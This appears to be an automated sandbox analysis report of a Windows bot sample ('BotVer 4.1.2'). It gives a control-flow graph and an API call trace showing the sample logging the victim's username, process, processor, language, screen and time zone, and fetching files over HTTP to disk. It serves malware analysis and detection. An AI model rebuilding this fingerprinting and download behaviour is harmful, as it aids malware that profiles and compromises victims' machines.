GetHandleInformation 83200->83202 83201->83086 83201->83096 83201->83097 83202->83201 83203 2bd8f98 83202->83203 83203->83201 83204 2bd8f9e CloseHandle 83203->83204 83204->83201 83206 2bd8bc6 83205->83206 83207 2bd8bd0 83205->83207 83206->83101 83208 2bd8bd6 83207->83208 83209 2bd8bf1 SetFilePointer 83207->83209 83208->83101 83209->83101 83211 2bd8e1f 83210->83211 83212 2bd8d79 83210->83212 83211->83071 83212->83211 83213 2bd8d82 GetFileType 83212->83213 83214 2bd8d8e 83213->83214 83215 2bd8dc0 GetLocalTime SystemTimeToFileTime FileTimeToDosDateTime 83213->83215 83318 2bd8890 GetFileType 83214->83318 83215->83071 83217 2bd8da3 83217->83211 83218 2bd8da7 SetFilePointer 83217->83218 83218->83071 83219->83071 83220->83094 83221->83107 83222->83106 83224 2bd8b84 83223->83224 83225 2bd8ac3 83223->83225 83226 2bd8b8a WriteFile 83224->83226 83227 2bd8bb0 83224->83227 83228 2bd8b62 memcpy 83225->83228 83229 2bd8adf CreateFileMappingA 83225->83229 83226->83125 83227->83125 83228->83125 83231 2bd8b1f 83229->83231 83232 2bd8b03 MapViewOfFile 83229->83232 83231->83125 83233 2bd8b2d memcpy UnmapViewOfFile 83232->83233 83234 2bd8b1a 83232->83234 83236 2bb7310 2 API calls 83233->83236 83235 2bb7310 2 API calls 83234->83235 83235->83231 83237 2bd8b50 83236->83237 83237->83228 83239 2bd74a2 memset 83238->83239 83241 2bd7528 83239->83241 83245 2bd8eb0 2 API calls 83241->83245 83242 2bd757c 83246 2bd7b00 83242->83246 83243 2bd755b 83243->83242 83257 2bd7770 memcpy memcpy ReadFile 83243->83257 83245->83243 83247 2bd7b23 83246->83247 83254 2bd7b2e 83246->83254 83278 2bd78b0 12 API calls 83247->83278 83249 2bd7d9f 83258 2bd6c00 83249->83258 83250 2bd7b28 83250->83195 83254->83249 83255 2bd6c00 9 API calls 83254->83255 83279 2bd7770 memcpy memcpy ReadFile 83254->83279 83255->83254 83256->83191 83257->83242 83259 2bd6c2d 83258->83259 83260 2bd6cc0 83259->83260 83261 2bd6c87 83259->83261 83262 2bd6cc6 83260->83262 83263 2bd6d01 83260->83263 83264 2bd71a0 8 API calls 83261->83264 83265 
2bd71a0 8 API calls 83262->83265 83280 2bd71a0 83263->83280 83267 2bd6c8f 83264->83267 83268 2bd6ccf 83265->83268 83308 2bd7350 9 API calls 83267->83308 83271 2bd6fb0 8 API calls 83268->83271 83275 2bd6cbb 83271->83275 83276 2bd6d8c 83275->83276 83304 2bd7260 83275->83304 83276->83195 83278->83250 83279->83254 83281 2bd71af 83280->83281 83282 2bd6d0a 83281->83282 83309 2bd8a80 83281->83309 83284 2bd6b30 83282->83284 83285 2bd6b47 83284->83285 83286 2bd71a0 8 API calls 83285->83286 83287 2bd6b83 83286->83287 83288 2bd71a0 8 API calls 83287->83288 83289 2bd6b91 83288->83289 83290 2bd71a0 8 API calls 83289->83290 83295 2bd6b9c 83290->83295 83291 2bd6bcc 83314 2bd6900 83291->83314 83293 2bd71a0 8 API calls 83293->83295 83295->83291 83295->83293 83296 2bd6900 8 API calls 83297 2bd6bee 83296->83297 83298 2bd6fb0 83297->83298 83299 2bd6fce 83298->83299 83302 2bd70c9 83298->83302 83299->83302 83303 2bd71a0 8 API calls 83299->83303 83300 2bd71a0 8 API calls 83301 2bd70e2 83300->83301 83301->83275 83302->83300 83303->83299 83305 2bd726c 83304->83305 83306 2bd7323 83305->83306 83307 2bd8a80 8 API calls 83305->83307 83306->83276 83307->83306 83308->83275 83310 2bd8a8d 83309->83310 83311 2bd8a92 83309->83311 83310->83282 83312 2bd8ab0 8 API calls 83311->83312 83313 2bd8a9f 83312->83313 83313->83282 83316 2bd6925 83314->83316 83315 2bd6a55 83315->83296 83316->83315 83317 2bd71a0 8 API calls 83316->83317 83317->83316 83319 2bd88a4 83318->83319 83320 2bd88b1 GetFileInformationByHandle 83318->83320 83319->83217 83321 2bd88cd GetSystemTime GetLocalTime SystemTimeToFileTime SystemTimeToFileTime 83320->83321 83322 2bd88c0 83320->83322 83323 2bd8925 GetFileSize 83321->83323 83322->83217 83325 2bd898e SetFilePointer ReadFile SetFilePointer ReadFile 83323->83325 83328 2bd8a1d 83323->83328 83326 2bd89d5 83325->83326 83325->83328 83327 2bd89e0 SetFilePointer ReadFile 83326->83327 83326->83328 83329 2bd8a01 83327->83329 83330 2bd8a4d FileTimeToDosDateTime 83328->83330 83331 2bd8a6e 
83328->83331 83329->83328 83330->83331 83331->83217 83333 2bd8c1d 83332->83333 83334 2bd8c23 83332->83334 83347 2bd9680 83333->83347 83336 2bd8c3d 83334->83336 83339 2bd8c36 UnmapViewOfFile 83334->83339 83337 2bd8c6e 83336->83337 83338 2bd8c4b GetHandleInformation 83336->83338 83341 2bd8c79 GetHandleInformation 83337->83341 83342 2bd8ca6 83337->83342 83338->83337 83340 2bd8c61 83338->83340 83339->83336 83340->83337 83343 2bd8c67 CloseHandle 83340->83343 83344 2bd8c98 83341->83344 83345 2bd8c8b 83341->83345 83342->83025 83343->83337 83344->83025 83345->83344 83346 2bd8c91 CloseHandle 83345->83346 83346->83344 83354 2bd96a8 83347->83354 83355 2bd9734 83347->83355 83348 2bd9707 GetProcessHeap HeapValidate 83353 2bd971d GetProcessHeap HeapFree 83348->83353 83348->83354 83349 2bd96e3 GetProcessHeap HeapValidate 83349->83348 83352 2bd96f7 GetProcessHeap HeapFree 83349->83352 83352->83348 83353->83354 83354->83348 83354->83349 83354->83355 83357 2bd81d0 83354->83357 83356 2bd9754 83355->83356 83456 2bd85d0 83355->83456 83356->83334 83358 2bd8ab0 8 API calls 83357->83358 83359 2bd81e5 83358->83359 83360 2bd8ab0 8 API calls 83359->83360 83361 2bd81f6 83360->83361 83362 2bd8ab0 8 API calls 83361->83362 83363 2bd8207 83362->83363 83364 2bd8ab0 8 API calls 83363->83364 83365 2bd8218 83364->83365 83366 2bd8ab0 8 API calls 83365->83366 83367 2bd822b 83366->83367 83368 2bd8ab0 8 API calls 83367->83368 83369 2bd823f 83368->83369 83370 2bd8ab0 8 API calls 83369->83370 83371 2bd8253 83370->83371 83372 2bd8ab0 8 API calls 83371->83372 83373 2bd8267 83372->83373 83374 2bd8ab0 8 API calls 83373->83374 83375 2bd827b 83374->83375 83376 2bd8ab0 8 API calls 83375->83376 83377 2bd828f 83376->83377 83378 2bd8ab0 8 API calls 83377->83378 83379 2bd82a3 83378->83379 83380 2bd8ab0 8 API calls 83379->83380 83381 2bd82b7 83380->83381 83382 2bd8ab0 8 API calls 83381->83382 83383 2bd82cb 83382->83383 83384 2bd8ab0 8 API calls 83383->83384 83385 2bd82df 83384->83385 83386 2bd8ab0 8 API calls 
83385->83386 83387 2bd82f3 83386->83387 83388 2bd8ab0 8 API calls 83387->83388 83389 2bd8307 83388->83389 83390 2bd8ab0 8 API calls 83389->83390 83391 2bd831b 83390->83391 83392 2bd8ab0 8 API calls 83391->83392 83393 2bd832f 83392->83393 83394 2bd8ab0 8 API calls 83393->83394 83395 2bd8343 83394->83395 83396 2bd8ab0 8 API calls 83395->83396 83397 2bd8357 83396->83397 83398 2bd8ab0 8 API calls 83397->83398 83399 2bd836b 83398->83399 83400 2bd8ab0 8 API calls 83399->83400 83401 2bd837f 83400->83401 83402 2bd8ab0 8 API calls 83401->83402 83403 2bd8393 83402->83403 83404 2bd8ab0 8 API calls 83403->83404 83405 2bd83a7 83404->83405 83406 2bd8ab0 8 API calls 83405->83406 83407 2bd83bb 83406->83407 83408 2bd8ab0 8 API calls 83407->83408 83409 2bd83cf 83408->83409 83410 2bd8ab0 8 API calls 83409->83410 83411 2bd83e3 83410->83411 83412 2bd8ab0 8 API calls 83411->83412 83413 2bd83f7 83412->83413 83414 2bd8ab0 8 API calls 83413->83414 83415 2bd840b 83414->83415 83416 2bd8ab0 8 API calls 83415->83416 83417 2bd8421 83416->83417 83418 2bd8ab0 8 API calls 83417->83418 83419 2bd8435 83418->83419 83420 2bd8ab0 8 API calls 83419->83420 83421 2bd844b 83420->83421 83422 2bd8ab0 8 API calls 83421->83422 83423 2bd845f 83422->83423 83424 2bd8ab0 8 API calls 83423->83424 83425 2bd8475 83424->83425 83426 2bd8ab0 8 API calls 83425->83426 83427 2bd8489 83426->83427 83428 2bd8ab0 8 API calls 83427->83428 83429 2bd849d 83428->83429 83430 2bd8ab0 8 API calls 83429->83430 83431 2bd84b1 83430->83431 83432 2bd8ab0 8 API calls 83431->83432 83433 2bd84c5 83432->83433 83434 2bd8ab0 8 API calls 83433->83434 83435 2bd84d9 83434->83435 83436 2bd8ab0 8 API calls 83435->83436 83437 2bd84ed 83436->83437 83438 2bd8ab0 8 API calls 83437->83438 83439 2bd8501 83438->83439 83440 2bd8ab0 8 API calls 83439->83440 83441 2bd8515 83440->83441 83442 2bd8ab0 8 API calls 83441->83442 83443 2bd8529 83442->83443 83444 2bd8ab0 8 API calls 83443->83444 83445 2bd853d 83444->83445 83446 2bd8ab0 8 API calls 83445->83446 83447 
2bd8551 83446->83447 83448 2bd8ab0 8 API calls 83447->83448 83449 2bd8565 83448->83449 83450 2bd857b 83449->83450 83451 2bd8ab0 8 API calls 83449->83451 83452 2bd85b1 83450->83452 83453 2bd8596 83450->83453 83454 2bd8ab0 8 API calls 83450->83454 83451->83450 83452->83354 83453->83452 83455 2bd8ab0 8 API calls 83453->83455 83454->83453 83455->83452 83457 2bd8ab0 8 API calls 83456->83457 83458 2bd85e9 83457->83458 83459 2bd8ab0 8 API calls 83458->83459 83460 2bd85fa 83459->83460 83461 2bd8ab0 8 API calls 83460->83461 83462 2bd860b 83461->83462 83463 2bd8ab0 8 API calls 83462->83463 83464 2bd861c 83463->83464 83465 2bd8ab0 8 API calls 83464->83465 83466 2bd862d 83465->83466 83467 2bd8ab0 8 API calls 83466->83467 83468 2bd863e 83467->83468 83469 2bd8ab0 8 API calls 83468->83469 83470 2bd864f 83469->83470 83471 2bd8ab0 8 API calls 83470->83471 83472 2bd8660 83471->83472 83473 2bd8ab0 8 API calls 83472->83473 83474 2bd8673 83473->83474 83475 2bd8ab0 8 API calls 83474->83475 83476 2bd868c 83475->83476 83477 2bd8ab0 8 API calls 83476->83477 83478 2bd869f 83477->83478 83479 2bd8ab0 8 API calls 83478->83479 83480 2bd86b2 83479->83480 83481 2bd8ab0 8 API calls 83480->83481 83482 2bd86c5 83481->83482 83483 2bd8ab0 8 API calls 83482->83483 83484 2bd86db 83483->83484 83485 2bd8ab0 8 API calls 83484->83485 83486 2bd86f1 83485->83486 83487 2bd8ab0 8 API calls 83486->83487 83488 2bd8707 83487->83488 83489 2bd8ab0 8 API calls 83488->83489 83490 2bd8717 83489->83490 83491 2bd8ab0 8 API calls 83490->83491 83492 2bd872c 83491->83492 83493 2bd8ab0 8 API calls 83492->83493 83494 2bd8741 83493->83494 83495 2bd8ab0 8 API calls 83494->83495 83496 2bd8754 83495->83496 83497 2bd8ab0 8 API calls 83496->83497 83498 2bd8765 83497->83498 83499 2bd8ab0 8 API calls 83498->83499 83500 2bd8776 83499->83500 83500->83356 83502 2bb75e6 83501->83502 83503 2bb74b5 CreateFileA 83501->83503 83505 2bb75ed IsBadWritePtr 83502->83505 83506 2bb75fc 83502->83506 83503->83502 83504 2bb74d7 GetFileSizeEx 
83503->83504 83508 2bb74f5 83504->83508 83514 2bb75b5 83504->83514 83505->83506 83506->83034 83506->83035 83506->83037 83506->83038 83507 2bb75ca GetHandleInformation 83507->83502 83509 2bb75d9 83507->83509 83510 2bb752f 83508->83510 83511 2bb7501 GetProcessHeap RtlAllocateHeap 83508->83511 83509->83502 83512 2bb75df CloseHandle 83509->83512 83510->83514 83515 2bb754c SetFilePointer LockFile ReadFile UnlockFile 83510->83515 83516 2bb7591 GetProcessHeap HeapValidate 83510->83516 83511->83510 83513 2bb7520 memset 83511->83513 83512->83502 83513->83510 83514->83502 83514->83507 83515->83514 83515->83516 83516->83514 83517 2bb75a5 GetProcessHeap HeapFree 83516->83517 83517->83514 83519 2bb6ce9 RegQueryValueExA 83518->83519 83520 2bb6db4 83518->83520 83519->83520 83523 2bb6d10 83519->83523 83521 2bb6dbb RegCloseKey 83520->83521 83522 2bb6dc2 83520->83522 83521->83522 83524 2bb6dd5 83522->83524 83587 2bb6b10 memset memset RegOpenKeyExA 83522->83587 83523->83520 83527 2bb6d73 GetProcessHeap HeapAlloc 83523->83527 83524->83042 83527->83520 83528 2bb6d8d memset 83527->83528 83528->83520 83529 2bb6da1 lstrcpynA 83528->83529 83529->83520 83531 2bc4f75 83530->83531 83532 2bc4b03 83530->83532 83531->83045 83532->83531 83533 2bc4bb0 InternetOpenA 83532->83533 83536 2bc4b1e GetProcessHeap HeapAlloc 83532->83536 83537 2bc4b49 83532->83537 83534 2bc4f1a 83533->83534 83535 2bc4bd3 InternetConnectA 83533->83535 83543 2bc4f27 GetProcessHeap HeapValidate 83534->83543 83544 2bc4f43 83534->83544 83535->83534 83538 2bc4bf2 HttpOpenRequestA 83535->83538 83539 2bc4b3a memset 83536->83539 83540 2bc4b46 83536->83540 83537->83531 83541 2bc4b54 memcpy 83537->83541 83538->83534 83545 2bc4c2a 83538->83545 83539->83540 83540->83537 83559 2bc4b70 83541->83559 83543->83544 83546 2bc4f37 GetProcessHeap HeapFree 83543->83546 83547 2bc4f4f InternetCloseHandle 83544->83547 83548 2bc4f55 83544->83548 83549 2bc4c4e 83545->83549 83554 2bc4c3b HttpAddRequestHeadersA 83545->83554 83546->83544 83547->83548 
83550 2bc4f5c InternetCloseHandle 83548->83550 83551 2bc4f5f 83548->83551 83555 2bc4c51 HttpAddRequestHeadersA 83549->83555 83550->83551 83552 2bc4f69 83551->83552 83553 2bc4f66 InternetCloseHandle 83551->83553 83552->83045 83553->83552 83554->83555 83556 2bc4c96 HttpSendRequestA 83555->83556 83557 2bc4c66 _snprintf HttpAddRequestHeadersA 83555->83557 83556->83534 83560 2bc4cb8 HttpQueryInfoA 83556->83560 83557->83556 83559->83533 83560->83534 83561 2bc4cdb 83560->83561 83561->83534 83562 2bc4ce8 CreateFileA 83561->83562 83562->83534 83563 2bc4d16 83562->83563 83564 2bd5930 8 API calls 83563->83564 83565 2bc4d1b 83564->83565 83566 2bc4d1f ConvertStringSecurityDescriptorToSecurityDescriptorW 83565->83566 83567 2bc4d76 GetProcessHeap RtlAllocateHeap 83565->83567 83566->83567 83568 2bc4d36 GetSecurityDescriptorSacl 83566->83568 83569 2bc4e5a 83567->83569 83570 2bc4d96 memset InternetReadFile 83567->83570 83575 2bc4d6c LocalFree 83568->83575 83576 2bc4d57 SetNamedSecurityInfoA 83568->83576 83573 2bc4e5e GetHandleInformation 83569->83573 83574 2bc4e81 83569->83574 83571 2bc4e3e GetProcessHeap HeapValidate 83570->83571 83572 2bc4dc5 83570->83572 83571->83569 83578 2bc4e4e GetProcessHeap HeapFree 83571->83578 83572->83571 83577 2bc4dcc 6 API calls 83572->83577 83573->83574 83579 2bc4e74 83573->83579 83580 2bb74a0 16 API calls 83574->83580 83575->83567 83576->83575 83577->83567 83581 2bc4e29 GetProcessHeap RtlFreeHeap 83577->83581 83578->83569 83579->83574 83582 2bc4e7a CloseHandle 83579->83582 83583 2bc4e91 83580->83583 83581->83567 83582->83574 83583->83534 83596 2bb7350 83583->83596 83585 2bc4efc GetProcessHeap HeapValidate 83585->83534 83586 2bc4f0c GetProcessHeap RtlFreeHeap 83585->83586 83586->83534 83588 2bb6b88 RegQueryValueExA 83587->83588 83589 2bb6c54 83587->83589 83588->83589 83592 2bb6baf 83588->83592 83590 2bb6c5b RegCloseKey 83589->83590 83591 2bb6c62 83589->83591 83590->83591 83591->83042 83592->83589 83593 2bb6c13 GetProcessHeap HeapAlloc 83592->83593 
83593->83589 83594 2bb6c2d memset 83593->83594 83594->83589 83595 2bb6c41 lstrcpynA 83594->83595 83595->83589 83597 2bb736b 83596->83597 83598 2bb748e 83596->83598 83597->83598 83599 2bb737c CreateFileA 83597->83599 83598->83585 83599->83598 83600 2bb739e 83599->83600 83601 2bd5930 8 API calls 83600->83601 83602 2bb73a3 83601->83602 83603 2bb73fe SetFilePointer LockFile WriteFile UnlockFile 83602->83603 83604 2bb73a7 ConvertStringSecurityDescriptorToSecurityDescriptorW 83602->83604 83606 2bb7459 83603->83606 83607 2bb7449 SetEndOfFile 83603->83607 83604->83603 83605 2bb73be GetSecurityDescriptorSacl 83604->83605 83608 2bb73df SetNamedSecurityInfoA 83605->83608 83609 2bb73f4 LocalFree 83605->83609 83610 2bb7483 83606->83610 83611 2bb7467 GetHandleInformation 83606->83611 83607->83606 83608->83609 83609->83603 83610->83585 83611->83610 83612 2bb7476 83611->83612 83612->83610 83613 2bb747c CloseHandle 83612->83613 83613->83610 83614 2bd5a50 GetSystemWindowsDirectoryA 83615 2bd5a90 83614->83615 83615->83615 83616 2bd5a97 GetVolumeInformationA 83615->83616 83617 2bd5ad8 83616->83617 83618 2bd5b1b _snprintf 83617->83618 83619 2bd5b51 _snprintf 83617->83619 83618->83617 83621 2bd5b9e 83619->83621

Control-flow Graph (legend: Executed / Not Executed)
APIs
• CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,02C0D3A4,75495CE0), ref: 02BB4C37
  • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
  • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
  • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
  • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000001), ref: 02BB4C5E
• LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB4C6F
• WriteFile.KERNEL32(00000000,{BotVer: ,00000009,02BB3F9D,00000000), ref: 02BB4C7F
• UnlockFile.KERNEL32(00000000,?,00000000,00000009,00000000), ref: 02BB4C90
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4CA4
• LockFile.KERNEL32(00000000,00000000,00000000,00000005,00000000), ref: 02BB4CB1
• WriteFile.KERNEL32(00000000,4.1.2,00000005,00000000,00000000), ref: 02BB4CC1
• UnlockFile.KERNEL32(00000000,?,00000000,00000005,00000000), ref: 02BB4CD2
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4CE6
• LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4CF3
• WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4D03
• UnlockFile.KERNEL32(00000000,?,00000000,00000002,00000000), ref: 02BB4D14
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BB4D28
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4D3C
• LockFile.KERNEL32(00000000,00000000,00000000,0000000A,00000000), ref: 02BB4D49
• WriteFile.KERNEL32(00000000,{Process: ,0000000A,00000000,00000000), ref: 02BB4D59
• UnlockFile.KERNEL32(00000000,?,00000000,0000000A,00000000), ref: 02BB4D6A
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4D9C
• LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4DAB
• WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB4DBF
• UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB4DD2
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4DE6
• LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4DF3
• WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4E03
• UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4E14
• GetUserNameA.ADVAPI32(?,00000104), ref: 02BB4E25
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4E39
• LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02BB4E46
• WriteFile.KERNEL32(00000000,{Username: ,0000000B,00000000,00000000), ref: 02BB4E56
• UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02BB4E67
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4E92
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4EA1
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB4EB5
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4EC8
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4EDC
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4EE9
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4EF9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4F0A
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 02BB4F21
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4F35
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB4F42
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Processor: ,0000000C,00000000,00000000), ref: 02BB4F52
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB4F63
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4F8E
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4F9D
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB4FB1
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4FC4
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4FD8
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4FE5
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4FF5
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5006
                                                                                                                                                                                                                • GetSystemDefaultLangID.KERNEL32 ref: 02BB500C
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB5026
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5093
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02BB50A0
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Language: ,0000000B,00000000,00000000), ref: 02BB50B0
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02BB50C1
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB50EC
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB50FB
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB510F
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5122
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5136
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5143
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB5153
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5164
                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 02BB516E
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000), ref: 02BB5175
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000001), ref: 02BB517E
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000000), ref: 02BB5187
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB519F
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB51B6
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB51C3
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Screen: ,00000009,00000000,00000000), ref: 02BB51D3
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB51E4
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB520F
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB521E
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB5232
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5245
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5259
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5266
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB5276
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5287
                                                                                                                                                                                                                • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 02BB52A7
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB52BB
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02BB52C8
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Date: ,00000007,00000000,00000000), ref: 02BB52D8
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02BB52E9
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5314
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5323
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB5337
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB534A
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB535E
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB536B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB537B
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB538C
                                                                                                                                                                                                                • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 02BB53AC
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB53C0
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02BB53CD
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Local time: ,0000000D,00000000,00000000), ref: 02BB53DD
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02BB53EE
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB541C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB542B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB543F
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5452
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5466
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5473
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB5483
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5494
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?), ref: 02BB54A1
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB5502
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5519
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02BB5526
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{GMT: ,00000006,00000000,00000000), ref: 02BB5536
